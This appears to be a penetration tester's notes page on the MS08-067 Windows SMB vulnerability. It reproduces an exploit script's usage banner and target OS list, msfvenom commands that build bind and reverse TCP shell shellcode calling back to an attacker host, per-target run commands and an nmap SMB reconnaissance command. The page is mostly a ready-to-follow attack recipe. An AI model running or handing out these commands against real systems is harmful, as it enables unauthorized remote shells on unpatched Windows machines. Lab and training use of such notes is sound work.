MS08-067

pentest_old/ms08-067-nc.py at master · 3mrgnc3/pentest_oldGitHub

    print '   ____________________________________________'
    print '  |                                            |'
    print '  | MS08-067 Exploit - Auto NC mod by 3mrgnc3  |'
    print '  |    Based On Ported MSF Exploit By EKOZ     |'
    print '  |____________________________________________|'
    print '  |                                            |'
    print '  |                   USAGE                    |'
    print '  |  MS08-067.py <rhost> <os> <lhost> <lport>  |'
    print '  |   eg: MS08-067.py 10.1.1.1 3 10.2.2.2 53   |'
    print '  |____________________________________________|'
    print '  |                                            |'
    print '  |            TARGET OS SELECTION             |'
    print '  |  1 = Windows XP SP0/SP1 Universal          |'
    print '  |  2 = Windows 2000 Universal                |'
    print '  |  3 = Windows 2003 SP0 Universal            |'
    print '  |  4 = Windows 2003 SP1 English              |'
    print '  |  5 = Windows XP SP3 French (NX)            |'
    print '  |  6 = Windows XP SP3 English (NX)           |'
    print '  |  7 = Windows XP SP3 English (AlwaysOn NX)  |'
    print '  |____________________________________________|'

Another awesome script on github: https://github.com/andyacer/ms08_067

# Generate shellcode
msfvenom -p windows/shell_bind_tcp RHOST=192.168.1.1 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_reverse_tcp LHOST=1.3.3.7 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_reverse_tcp LHOST=1.3.3.7 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows   

# Usage: ms08_067_2018.py <os #> <Port #>

ms08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
ms08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
ms08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
ms08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
ms08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
ms08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
ms08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

# nmap has a good OS discovery script that pairs well with this exploit:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1

PreviousMS17-010 NextActive Directory

Last updated 5 years ago